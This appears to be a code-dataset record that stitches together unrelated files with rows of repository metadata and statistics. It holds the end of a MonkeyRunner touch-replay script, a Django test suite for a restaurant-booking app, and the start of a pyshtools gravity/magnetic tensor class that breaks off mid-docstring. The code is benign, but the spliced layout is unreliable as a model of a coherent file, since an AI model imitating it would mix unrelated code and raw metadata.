MonkeyRunner.sleep(1.0)
device.touch(118, 608, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(118, 608, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(165, 444, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(165, 444, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(914, 1832, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(914, 1832, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(877, 1032, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(877, 1032, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(87, 72, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(87, 72, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)
print('Executing : device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
print('Finish to reproduce action log')
| 35.236842
| 75
| 0.791636
| 194
| 1,339
| 5.309278
| 0.21134
| 0.217476
| 0.258252
| 0.285437
| 0.814563
| 0.752427
| 0.752427
| 0.738835
| 0.292233
| 0.247573
| 0
| 0.07114
| 0.076176
| 1,339
| 38
| 76
| 35.236842
| 0.76152
| 0.022405
| 0
| 0.25
| 0
| 0
| 0.412844
| 0.155199
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.392857
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
167112d052f90389462fef038cc2d92f36bb6170
| 28,803
|
py
|
Python
|
webapp/tests.py
|
srijanss/rhub
|
60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
|
[
"MIT"
] | null | null | null |
webapp/tests.py
|
srijanss/rhub
|
60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
|
[
"MIT"
] | null | null | null |
webapp/tests.py
|
srijanss/rhub
|
60a5b2cd4a1fae3cd9d9029e132bcf1f5154cc54
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.urls import reverse
from django.test import TestCase
from django.utils import timezone
import copy
from django.contrib.auth.models import User, Group
from .models import Restaurant, Type, Cuisine, Food, Booking
from .views import set_permissions
CREDENTIIALS = {
'name': 'test',
'description': 'test',
'state': 'test',
'city': 'test',
'street': 'test',
'longitude': 0.000111,
'latitude': 0.000111,
'telephone': '1234567890',
'website': 'http://test.com'
}
class RestaurantModelTests(TestCase):
def test_restaurant_object_creation(self):
"""
Restaurant object created must return true for isinstance() and
__str__() must be equal to restaurant's name
"""
restaurant = create_restaurant("Test Restaurant")
self.assertIs(isinstance(restaurant, Restaurant), True)
self.assertEqual(restaurant.__str__(), restaurant.name)
class TypeModelTests(TestCase):
def test_type_object_creation(self):
"""
Type object created must return true for isinstance() and
__str__() must be equal to restaurant's type
"""
restaurant_type = Type.objects.create(name="Test Restaurant Type")
self.assertIs(isinstance(restaurant_type, Type), True)
self.assertEqual(restaurant_type.__str__(), restaurant_type.name)
class CuisineModelTests(TestCase):
def test_cuisine_object_creation(self):
"""
Cuisine object created must return true for isinstance() and
__str__() must be equal to cuisine name
"""
cuisine = Cuisine.objects.create(name="Test Cuisine")
self.assertIs(isinstance(cuisine, Cuisine), True)
self.assertEqual(cuisine.__str__(), cuisine.name)
class FoodModelTests(TestCase):
def test_food_object_creation(self):
"""
Food object created must return true for isinstance() and
__str__() must be equal to food name
"""
cuisine = Cuisine.objects.create(name="Test Cuisine")
food = Food.objects.create(name="Test Food", cuisine_id=cuisine.id)
self.assertIs(isinstance(food, Food), True)
self.assertEqual(food.__str__(), food.name)
class BookModelTests(TestCase):
def test_booking_object_creation(self):
""" Booking object created must return restaurant name
and booked date and time
"""
user = User.objects.create_user(username='test')
restaurant = create_restaurant('Test Restaurant')
booking_date = timezone.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
self.assertIs(isinstance(booking, Booking), True)
self.assertEqual(booking.__str__(), booking.restaurant.name + ", Time: " + booking_date.strftime('%Y-%m-%d %H:%M:%S'))
class IndexViewTests(TestCase):
def test_no_restaurants(self):
""" If no Restaurant exists appropriate message should be displayed
"""
response = self.client.get(reverse('webapp:index'))
self.assertContains(response, "No restaurant added")
self.assertQuerysetEqual(response.context['restaurant_list'], [])
def test_one_restaurant(self):
""" If one Restaurant exists it should be displayed in the index page
"""
create_restaurant("Test Restaurant")
response = self.client.get(reverse('webapp:index'))
self.assertQuerysetEqual(response.context['restaurant_list'], [
'<Restaurant: Test Restaurant>'])
def test_two_restaurants(self):
""" If two Restaurant exists both should be displayed in the index page
"""
create_restaurant("Test Restaurant 1")
create_restaurant("Test Restaurant 2")
response = self.client.get(reverse('webapp:index'))
self.assertQuerysetEqual(response.context['restaurant_list'],
['<Restaurant: Test Restaurant 2>',
'<Restaurant: Test Restaurant 1>']
)
class DetailViewTests(TestCase):
def test_no_restaurant(self):
""" If restaurant with given id is not found message
Restaurant doesnot exists should be shown to user
"""
response = self.client.get(reverse('webapp:detail', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, "Restaurant doesnot exists..")
def test_with_restaurant(self):
""" If restaurant exists restaurant details must shown in detail page
"""
restaurant = create_restaurant("Test Restaurant")
response = self.client.get(
reverse('webapp:detail', args=(restaurant.id,)))
self.assertEqual(
response.context['restaurant'].name, 'Test Restaurant')
class SearchViewTests(TestCase):
def test_search_view_with_get_request(self):
""" GET request to search page should redirect to listing page
and show all the listings of restaurants
"""
response = self.client.get(reverse('webapp:search'))
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
def test_search_view_with_post_request(self):
""" POST request to search page should redirect to listing page
and show the lists of restaurant matching the search item
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=(search_text,)))
def test_search_view_with_empty_data_request(self):
""" POST request to search page with empty string should redirect to listing page
and show the all lists of restaurant
"""
create_restaurant("Test Restaurant")
search_text = ""
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
class SearchViewListingTests(TestCase):
def test_no_matching_content(self):
""" If search content doesnot match the restaurant name or type
or restaurant doesnot exists, appropriate message should be shown
"""
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], [])
def test_name_matching_with_search_text(self):
""" If search content match with the restaurant name
that restaurant should be shown in the list
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_type_matching_with_search_text(self):
""" If search content match with the restaurant type
that restaurant should be shown in the list
"""
restaurant = create_restaurant("Test Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_name_and_type_matching_with_search_text(self):
""" If search content matches the restaurant name and type
only one result of the matching restaurant should be shown
"""
restaurant = create_restaurant("Diner Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant>'])
def test_search_list_pagination_with_given_pagenumber(self):
""" If page number is given as parameter then search list should
show that page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 2
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
def test_search_list_pagination_with_noninteger_pagenumber(self):
""" If non integer page number is given as parameter then search list should
show the first page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = "two"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 1>','<Restaurant: Diner Restaurant 2>'])
def test_search_list_pagination_with_nonexisting_pagenumber(self):
""" If non existing page number is given as parameter then search list should
show the last page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 5
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
class RestaurantCreateViewTests(TestCase):
def test_view_loads(self):
""" View should be loaded for GET request
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:restaurant_create'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webapp/restaurant_form.html')
def test_view_fails_blank(self):
""" Validation error should be shown if posted with blank data
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:restaurant_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_view_fails_invalid(self):
""" Validation error should be shown if invalid data is posted
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
self.credentials = CREDENTIIALS.copy()
self.credentials['longitude'] = 'error'
response = self.client.post(
reverse('webapp:restaurant_create'), self.credentials)
self.assertFormError(response, 'form', 'longitude', 'Enter a number.')
def test_view_valid_post(self):
""" If there is no validation error then it should redirect to restaurant's detail page
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
type1 = Type.objects.create(name="test")
cuisine1 = Cuisine.objects.create(name="test")
self.credentials = CREDENTIIALS.copy()
self.credentials["types"] = [type1.id]
self.credentials["cuisines"] = [cuisine1.id]
response = self.client.post(
reverse('webapp:restaurant_create'), self.credentials)
self.assertRedirects(response, reverse('webapp:detail', args=(1,)))
class RestaurantUpdateViewTests(TestCase):
def test_no_restaurant(self):
""" If restaurant with given id is not found it should show message
Restaurant doesnot exists
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:restaurant_update', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, "Restaurant doesnot exists..")
def test_view_loads(self):
""" View loaded with data related to restaurant should be loaded for GET request
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.get(
reverse('webapp:restaurant_update', args=(restaurant.id,)))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webapp/restaurant_form.html')
def test_view_fails_invalid(self):
""" Validation error in updating should be shown if invalid data is posted
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
self.credentials = CREDENTIIALS.copy()
self.credentials['longitude'] = 'error'
response = self.client.post(
reverse('webapp:restaurant_update', args=(restaurant.id,)), self.credentials)
self.assertFormError(response, 'form', 'longitude', 'Enter a number.')
def test_view_valid_post(self):
""" If there is no validation error then it should redirect to restaurant's detail page
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
type1 = Type.objects.create(name="test")
cuisine1 = Cuisine.objects.create(name="test")
self.credentials = CREDENTIIALS.copy()
self.credentials["types"] = [type1.id]
self.credentials["cuisines"] = [cuisine1.id]
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.post(
reverse('webapp:restaurant_update', args=(restaurant.id,)), self.credentials)
self.assertRedirects(response, reverse('webapp:detail', args=(1,)))
def test_view_delete_restaurant(self):
""" If there is delete_btn in POST request submission the restaurant object
should be deleted and page must be redirected to index page"
"""
owner = create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.post(reverse('webapp:restaurant_update', args=(
restaurant.id,)), {'delete_btn': 'delete_btn'})
self.assertRedirects(response, reverse('webapp:index'))
class CuisineCreateViewTests(TestCase):
def test_cuisine_create_form_pop_up(self):
""" When Add cuisine button is pressed popup should appear with
add cuisine form
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:cuisine_create'))
self.assertTemplateUsed(response, 'webapp/popup_form.html')
def test_cuisine_create_form_with_blank_data(self):
""" Cuisine create form should notify the error when blank data is submitted
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:cuisine_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_cuisine_create_form_with_valid_data(self):
""" Cuisine create form should disappear and notify of cuisine creation
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:cuisine_create'), {
'name': 'TEST CUISINE'})
self.assertEqual(response.status_code, 302)
# TODO: self.assertContains(response, 'New Cuisine Created.')
class TypeCreateViewTests(TestCase):
def test_type_create_form_pop_up(self):
""" When Add cuisine button is pressed popup should appear with
add cuisine form
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:type_create'))
self.assertTemplateUsed(response, 'webapp/popup_form.html')
def test_type_create_form_with_blank_data(self):
""" Cuisine create form should notify the error when blank data is submitted
"""
create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:type_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_type_create_form_with_valid_data(self):
""" Cuisine create form should disappear and notify of cuisine creation
"""
create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:type_create'), {'name':'TEST TYPE'})
self.assertEqual(response.status_code, 302)
# TODO: self.assertContains(response, 'New Cuisine Created.')
class UserCreateViewTests(TestCase):
def test_user_create_view_loads(self):
""" GET request to user create view must load the signup form
"""
response = self.client.get(reverse('register_user'))
self.assertTemplateUsed(response, 'webapp/registration/signup_form.html')
def test_owner_create_view_load(self):
""" GET request to owner create view must load the signup form
"""
response = self.client.get(reverse('register_owner'))
self.assertTemplateUsed(response, 'webapp/registration/signup_form.html')
def test_user_create_view_valid_data(self):
""" POST with valid request must redirect to login page
"""
response = self.client.post(reverse('register_user'), {'username':'test', 'email':'test@example.com', 'password1':'TampereFI', 'password2':'TampereFI'})
self.assertRedirects(response, reverse('login'))
def test_owner_create_view_valid_data(self):
""" POST with valid request must redirect to login page
"""
response = self.client.post(reverse('register_owner'), {'username':'test', 'email':'test@example.com', 'password1':'TampereFI', 'password2':'TampereFI'})
self.assertRedirects(response, reverse('login'))
class UserProfileViewTests(TestCase):
def test_user_profile_view_loads(self):
""" Profile view must be of the logged in user
"""
owner = create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:profile'))
self.assertContains(response, 'Test User')
def test_user_profile_view_with_booking_list(self):
""" Profile view of user must load with the list of bookings they have made
"""
user = User.objects.create_user(username='Test User', password='testpwd')
group = Group.objects.create(name='customer')
user.groups.add(group)
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:profile'))
self.assertQuerysetEqual(response.context['context_list'], ['<Booking: Test Restaurant, Time: ' + booking_date.strftime('%Y-%m-%d %H:%M:%S') + '>'])
def test_owner_profile_view_with_restaurant_list(self):
""" Profile view of owner must load with the list of restaurant they own
"""
owner = create_owner('Test User','test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
restaurant = create_restaurant("Test Restaurant")
restaurant.users.add(owner)
response = self.client.get(reverse('webapp:profile'))
self.assertQuerysetEqual(response.context['context_list'], ['<Restaurant: Test Restaurant>'])
class BookingViewTests(TestCase):
def test_booking_creation_view_load(self):
""" Booking creation view should load with restaurant selected
whose book table button was clicked
"""
restaurant = create_restaurant('Test Restauarant')
response = self.client.get(reverse('webapp:booking_create', args=(restaurant.id,)))
self.assertTemplateUsed(response, 'webapp/booking_form.html')
self.assertEqual(response.context['restaurant_id'], str(restaurant.id))
def test_booking_creation_view_without_login(self):
""" Try to create Booking without login should should show appropriate
message and same booking create form should be displayed
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user, 'restaurant':restaurant, 'booking_date':booking_date, 'number_of_people':2}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'You must Login to make bookings!!')
self.assertRedirects(response, reverse('webapp:booking_create', args=(restaurant.id,)))
def test_booking_create_view_with_invalid_data(self):
""" Booking update view with invalid data
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':'two', 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
self.assertFormError(response, 'form', 'number_of_people', 'Enter a whole number.')
def test_booking_creation_view_with_login(self):
""" Booking creation by logged in user should be redirected to
next url given in the POST reqeust
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':2, 'next':reverse('webapp:index')}
response = self.client.post(reverse('webapp:booking_create', args=(restaurant.id,)), booking_credentials, follow=True)
self.assertRedirects(response, reverse('webapp:index'))
def test_booking_update_view_with_no_booking_found(self):
""" If no booking found message must be shown to indicate that
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:booking_update', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking doesnot exists..')
def test_booking_update_view_load(self):
""" Booking update view should load with restaurant selected
whose book table button was clicked
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:booking_update', args=(booking.id,)))
self.assertTemplateUsed(response, 'webapp/booking_form.html')
self.assertEqual(response.context['restaurant_id'], restaurant.id)
self.assertEqual(response.context['booking_id'], str(booking.id))
def test_booking_update_view_with_login(self):
""" Booking update by logged in user should be redirected to
next url given in the POST reqeust
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':3, 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_update', args=(booking.id,)), booking_credentials, follow=True)
self.assertRedirects(response, reverse('webapp:profile'))
def test_booking_update_view_with_invalid_data(self):
""" Booking update view with invalid data
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
booking_credentials = {'user':user.id, 'restaurant':restaurant.id, 'booking_date':booking_date, 'number_of_people':'two', 'next':reverse('webapp:profile')}
response = self.client.post(reverse('webapp:booking_update', args=(booking.id,)), booking_credentials)
self.assertFormError(response, 'form', 'number_of_people', 'Enter a whole number.')
def test_booking_delete_view_when_booking_object_notfound(self):
""" Booking delete view should show appropriate message
when trying to delete booking that doesnot exists
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:booking_delete', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking doesnot exists..')
def test_booking_delete_view(self):
""" Booking delete view should delete booking with message
"""
restaurant = create_restaurant('Test Restauarant')
user = User.objects.create_user(username='Test User', password='testpwd')
self.client.login(username='Test User', password='testpwd')
booking_date = datetime.datetime.now()
booking = Booking.objects.create(user=user, restaurant=restaurant, booking_date=booking_date, number_of_people=2)
response = self.client.get(reverse('webapp:booking_delete', args=(booking.id,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, 'Booking removed.')
# Helper functions
def create_restaurant(restaurant_name):
return Restaurant.objects.create(name=restaurant_name,
description="test restaurant",
state="test",
city="test",
street="test",
longitude=0.0,
latitude=0.0,
telephone="test",
website="test.com")
def create_owner(username, email, password):
user = User.objects.create_user(username=username, email=email, password=password)
group = Group.objects.create(name='owner')
set_permissions(group, 'webapp', 'restaurant')
set_permissions(group, 'webapp', 'type')
set_permissions(group, 'webapp', 'cuisine')
user.groups.add(group)
return user
| 44.586687
| 161
| 0.725654
| 3,568
| 28,803
| 5.711883
| 0.077074
| 0.035819
| 0.041511
| 0.042395
| 0.811335
| 0.777429
| 0.745093
| 0.728263
| 0.70157
| 0.694799
| 0
| 0.005579
| 0.147415
| 28,803
| 645
| 162
| 44.655814
| 0.824327
| 0.005486
| 0
| 0.584726
| 0
| 0
| 0.214406
| 0.039652
| 0
| 0
| 0
| 0.003101
| 0.169451
| 0
| null | null | 0.095465
| 0.02148
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
167c9f2314570c1155e94a618557e4d5e0a04fe7
| 176,595
|
py
|
Python
|
pyshtools/shclasses/shtensor.py
|
nephanth/SHTOOLS
|
663d267715639de65f244b1e5ff8826cda0e9c8d
|
[
"BSD-3-Clause"
] | 7
|
2015-03-11T10:03:47.000Z
|
2020-11-01T20:00:47.000Z
|
pyshtools/shclasses/shtensor.py
|
nephanth/SHTOOLS
|
663d267715639de65f244b1e5ff8826cda0e9c8d
|
[
"BSD-3-Clause"
] | 1
|
2016-07-18T15:14:19.000Z
|
2016-07-18T15:14:19.000Z
|
pyshtools/shclasses/shtensor.py
|
nephanth/SHTOOLS
|
663d267715639de65f244b1e5ff8826cda0e9c8d
|
[
"BSD-3-Clause"
] | 3
|
2016-11-27T03:14:39.000Z
|
2021-05-28T01:42:53.000Z
|
"""
Class for the gravity and magnetic field 'gradient' tensors.
"""
import numpy as _np
import matplotlib as _mpl
import matplotlib.pyplot as _plt
import copy as _copy
from scipy.linalg import eigvalsh as _eigvalsh
import xarray as _xr
from .shgrid import SHGrid as _SHGrid
class Tensor(object):
"""
Generic class for gravity and magnetic field tensors. To initialize the
class, use the method tensor() of an SHGravCoeffs or SHMagCoeffs
class instance.
"""
def __init__(self):
"""Unused constructor of the main class."""
print('Initialize the class using one of the two methods:\n'
'>>> pyshtools.SHGravCoeffs.tensor\n'
'>>> pyshtools.SHMagCoeffs.tensor\n')
def compute_invar(self):
"""
Compute the three invariants (I0, I1, I2) of the tensor, as well as
the quantity I = -(I2/2)**2 / (I1/3)**3.
"""
self.i0 = self.vxx + self.vyy + self.vzz
self.i1 = (self.vxx*self.vyy + self.vyy*self.vzz + self.vxx*self.vzz -
self.vxy**2 - self.vyz**2 - self.vxz**2)
self.i2 = (self.vxx*(self.vyy*self.vzz - self.vyz**2) +
self.vxy*(self.vyz*self.vxz - self.vxy*self.vzz) +
self.vxz*(self.vxy*self.vyz - self.vxz*self.vyy))
self.i = (-1.) * (self.i2 / 2.)**2
self.i.data[1:self.nlat-self.extend, :] /= \
(self.i1.data[1:self.nlat-self.extend, :] / 3.)**3
def compute_eig(self):
"""
Compute the three eigenvalues of the tensor: eig1, eig2, ei3.
"""
self.eig1 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eig2 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eig3 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
for i in range(self.nlat):
for j in range(self.nlon):
a = _np.array([[self.vxx.data[i, j],
self.vxy.data[i, j],
self.vxz.data[i, j]],
[self.vyx.data[i, j],
self.vyy.data[i, j],
self.vyz.data[i, j]],
[self.vzx.data[i, j],
self.vzy.data[i, j],
self.vzz.data[i, j]]])
eigs = _eigvalsh(a)
self.eig1.data[i, j] = eigs[2]
self.eig2.data[i, j] = eigs[1]
self.eig3.data[i, j] = eigs[0]
def compute_eigh(self):
"""
Compute the two horizontal eigenvalues of the tensor (eigh1, and
eigh2), as well as the combined maximum absolute value of the two
(eighh).
"""
self.eigh1 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eigh2 = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
self.eighh = _SHGrid.from_array(_np.zeros_like(self.vxx.data),
grid='DH')
for i in range(self.nlat):
for j in range(self.nlon):
a = _np.array([[self.vxx.data[i, j],
self.vxy.data[i, j]],
[self.vyx.data[i, j],
self.vyy.data[i, j]]])
eigs = _eigvalsh(a)
self.eigh1.data[i, j] = eigs[1]
self.eigh2.data[i, j] = eigs[0]
if abs(eigs[0]) >= abs(eigs[1]):
self.eighh.data[i, j] = eigs[0]
else:
self.eighh.data[i, j] = eigs[1]
def copy(self):
"""
Return a deep copy of the class instance.
Usage
-----
copy = x.copy()
"""
return _copy.deepcopy(self)
def info(self):
"""
Print a summary of the data stored in the SHGravTensor class instance.
Usage
-----
x.info()
"""
print(repr(self))
def plot_vxx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxx component of the tensor.
Usage
-----
x.plot_vxx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
